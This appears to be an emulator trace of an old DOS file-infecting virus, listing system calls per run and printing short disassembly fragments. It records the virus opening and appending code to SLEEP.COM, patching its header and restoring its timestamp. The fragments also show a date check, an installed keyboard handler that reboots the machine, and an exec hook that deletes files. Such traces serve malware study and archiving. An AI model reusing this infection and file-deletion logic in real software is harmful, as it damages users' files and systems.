2018-12-25T11:51:03.039611434Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.041689598Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.050884748Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.06381467Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.069038491Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.080555733Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.088948236Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.096801539Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.098595847Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.102023628Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.105487402Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.10707747Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.110846415Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.112798255Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.121646682Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.133156121Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.137031269Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.148150568Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.155723647Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.164249317Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.166197255Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.169232842Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.17958928Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.181558202Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.189297131Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.192004722Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.201087007Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.212438192Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.216670305Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.228513604Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.236339523Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.245182818Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.24759679Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.250627848Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.254273287Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.257287208Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.260594107Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.26268983Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.272013632Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.283410748Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.287111817Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.298816626Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.308050172Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.312300044Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.315162849Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.31785337Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.321902475Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.324518443Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.32847682Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.330422868Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.339630445Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.352367584Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.355563047Z 42 PC: 12c0d | Get date 0x12c0d: cmp dl, 1
0x12c10: je 0x12c14
0x12c12: jmp 0x12c7b
0x12c14: mov ah, 9
0x12c16: lea dx, word ptr [bp + 0x25b]
0x12c1a: int 0x21
0x12c1c: jmp 0x12c48
0x12c1e: push ax
0x12c1f: in al, 0x60
0x12c21: cmp al, 0x53
0x12c23: je 0x12c2b
0x12c25: pop ax
0x12c26: ljmp ptr cs:[0x27f]
0x12c2b: ljmp 0xffff:0
0x12c30: iret
0x12c31: cmp ax, 0x4b00
0x12c34: jne 0x12c3a
0x12c36: mov ah, 0x41
0x12c38: int 0x21
0x12c3a: cmp ax, 0x4b9f
2018-12-25T11:51:03.358506219Z 26 PC: 12c84 | Set disk transfer address
2018-12-25T11:51:03.361359224Z 76 PC: 12a5b | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4145,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:02.923855263Z 26 PC: 12b70 | Set disk transfer address
2018-12-25T11:51:02.92603905Z 78 PC: 12b7b | Find first file
2018-12-25T11:51:02.933349156Z 67 PC: 12b9b | Get or set file attributes
2018-12-25T11:51:02.950036813Z 61 PC: 12ba4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:02.964442156Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:02.972082897Z 66 PC: 12bb8 | Move file pointer
2018-12-25T11:51:02.974031182Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
0x12bcb: call 0x22b39
0x12bce: cdq
0x12bcf: sub cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x27c]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]
0x12be5: mov cx, word ptr [bp + 0x29d]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx
2018-12-25T11:51:02.977125862Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-25T11:51:02.987610361Z 66 PC: 12bd6 | Move file pointer
2018-12-25T11:51:02.989323288Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:02.996694507Z 87 PC: 12bf4 | Get or set file date and time
2018-12-25T11:51:02.999622948Z 62 PC: 12bf8 | Close file
2018-12-25T11:51:03.008766718Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T11:51:03.019998704Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.023559004Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.035099464Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.042705049Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.050260869Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.052231695Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.055464318Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.059300688Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.062551746Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.06619759Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.068187202Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.077316324Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.088603002Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.092496457Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.10457777Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.11236948Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.119896971Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.122116022Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.125385523Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.128797419Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.130441204Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.134297094Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.136271607Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.144793482Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.156496227Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.160671438Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.171919399Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.180607904Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.188258864Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.19048398Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.194501291Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.197940621Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.199698126Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.203590135Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.205626689Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.214342602Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.227039373Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.231396135Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.243043053Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.251332672Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.26008001Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.262136271Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.265202722Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.269695872Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.271421475Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.274439946Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.277208028Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.285920782Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.297785833Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.302447204Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.317144355Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.324949809Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.33254862Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.334821426Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.337655145Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.348557561Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.352434098Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.360378049Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.362583246Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.373692181Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.387786436Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.391505089Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.403989493Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.413176988Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.420829797Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.423691298Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.427039919Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.431403801Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.43319062Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.437160972Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.438993065Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.447424367Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.459809164Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.462664086Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.473548995Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.4814152Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.488528663Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.490091109Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.493246573Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.501971807Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.503854088Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.50824658Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.5103362Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.519241639Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.531653954Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.535007895Z 42 PC: 12c0d | Get date 0x12c0d: cmp dl, 1
0x12c10: je 0x12c14
0x12c12: jmp 0x12c7b
0x12c14: mov ah, 9
0x12c16: lea dx, word ptr [bp + 0x25b]
0x12c1a: int 0x21
0x12c1c: jmp 0x12c48
0x12c1e: push ax
0x12c1f: in al, 0x60
0x12c21: cmp al, 0x53
0x12c23: je 0x12c2b
0x12c25: pop ax
0x12c26: ljmp ptr cs:[0x27f]
0x12c2b: ljmp 0xffff:0
0x12c30: iret
0x12c31: cmp ax, 0x4b00
0x12c34: jne 0x12c3a
0x12c36: mov ah, 0x41
0x12c38: int 0x21
0x12c3a: cmp ax, 0x4b9f
2018-12-25T11:51:03.537801197Z 9 PC: 12c1c | Display string (String= 'Bad command or filename')
2018-12-25T11:51:03.540921273Z 53 PC: 12c4d | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T11:51:03.543034022Z 37 PC: 12c5f | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T11:51:03.544632508Z 53 PC: 12c64 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:51:03.546294374Z 37 PC: 12c76 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T11:51:03.54872194Z 49 PC: 12c7b | Terminate and stay resident (Return code = '0' | Memory size = '34')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4145,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:51:03.116408303Z 26 PC: 12b70 | Set disk transfer address
2018-12-25T11:51:03.118546476Z 78 PC: 12b7b | Find first file
2018-12-25T11:51:03.124762889Z 67 PC: 12b9b | Get or set file attributes
2018-12-25T11:51:03.141401222Z 61 PC: 12ba4 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:51:03.156264032Z 63 PC: 12bb0 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:51:03.163425207Z 66 PC: 12bb8 | Move file pointer
2018-12-25T11:51:03.165370006Z 44 PC: 12bc7 | Get time 0x12bc7: mov word ptr [bp + 0x11d], dx
0x12bcb: call 0x22b39
0x12bce: cdq
0x12bcf: sub cx, cx
0x12bd1: mov ax, 0x4200
0x12bd4: int 0x21
0x12bd6: lea dx, word ptr [bp + 0x27c]
0x12bda: mov cx, 3
0x12bdd: mov ah, 0x40
0x12bdf: int 0x21
0x12be1: mov dx, word ptr [bp + 0x29f]
0x12be5: mov cx, word ptr [bp + 0x29d]
0x12be9: and cl, 0xe0
0x12bec: or cl, 0x15
0x12bef: mov ax, 0x5701
0x12bf2: int 0x21
0x12bf4: mov ah, 0x3e
0x12bf6: int 0x21
0x12bf8: lea dx, word ptr [bp + 0x2a5]
0x12bfc: sub cx, cx
2018-12-25T11:51:03.167999821Z 64 PC: 12b47 | Write file or device (Write 380 bytes on handle 5)
2018-12-25T11:51:03.177157853Z 66 PC: 12bd6 | Move file pointer
2018-12-25T11:51:03.178704551Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:51:03.185574553Z 87 PC: 12bf4 | Get or set file date and time
2018-12-25T11:51:03.191781893Z 62 PC: 12bf8 | Close file
2018-12-25T11:51:03.199858378Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T11:51:03.208942257Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.212380988Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.219988947Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.224170737Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.230755182Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.232274095Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.234673895Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.237800504Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.240244301Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.242904823Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.244314399Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.249471253Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.258859704Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.261735435Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.27465512Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.282031752Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.288358336Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.290909074Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.293250146Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.296082029Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.298520617Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.301000824Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.302327908Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.310230929Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.320167987Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.322757837Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.333405892Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.348266745Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.364485504Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.36625468Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.369087847Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.372061919Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.37367025Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.377331426Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.378786286Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.385970008Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.396244234Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.398795373Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.408622313Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.415970964Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.422093442Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.423426033Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.426668508Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.42949919Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.430849455Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.433883254Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.435523367Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.454157687Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.464833354Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.468319459Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.479080462Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.486558751Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.493507991Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.495168799Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.498496976Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.507257132Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.50859172Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.515910442Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.517732708Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.525225955Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.536156435Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.539215413Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.54950908Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.557113434Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.563353861Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.564787516Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.567365308Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.570605119Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.572040943Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.574635859Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.57755815Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.584531134Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.593954207Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.596782274Z 67 PC: 12b9b | Get or set file attributes (See above)
2018-12-25T11:51:03.608895201Z 61 PC: 12ba4 | Open file (See above)
2018-12-25T11:51:03.615391366Z 63 PC: 12bb0 | Read file or device (See above)
2018-12-25T11:51:03.621975237Z 66 PC: 12bb8 | Move file pointer (See above)
2018-12-25T11:51:03.623549879Z 44 PC: 12bc7 | Get time (See above)
2018-12-25T11:51:03.62598742Z 64 PC: 12b47 | Write file or device (See above)
2018-12-25T11:51:03.63445511Z 66 PC: 12bd6 | Move file pointer (See above)
2018-12-25T11:51:03.635990836Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T11:51:03.638873615Z 87 PC: 12bf4 | Get or set file date and time (See above)
2018-12-25T11:51:03.641921223Z 62 PC: 12bf8 | Close file (See above)
2018-12-25T11:51:03.649291007Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T11:51:03.658782398Z 79 PC: 12b7b | Find next file (See above)
2018-12-25T11:51:03.661965401Z 42 PC: 12c0d | Get date 0x12c0d: cmp dl, 1
0x12c10: je 0x12c14
0x12c12: jmp 0x12c7b
0x12c14: mov ah, 9
0x12c16: lea dx, word ptr [bp + 0x25b]
0x12c1a: int 0x21
0x12c1c: jmp 0x12c48
0x12c1e: push ax
0x12c1f: in al, 0x60
0x12c21: cmp al, 0x53
0x12c23: je 0x12c2b
0x12c25: pop ax
0x12c26: ljmp ptr cs:[0x27f]
0x12c2b: ljmp 0xffff:0
0x12c30: iret
0x12c31: cmp ax, 0x4b00
0x12c34: jne 0x12c3a
0x12c36: mov ah, 0x41
0x12c38: int 0x21
0x12c3a: cmp ax, 0x4b9f
2018-12-25T11:51:03.664031901Z 26 PC: 12c84 | Set disk transfer address
2018-12-25T11:51:03.664987299Z 76 PC: 12a5b | Terminate with return code (Return code = '1')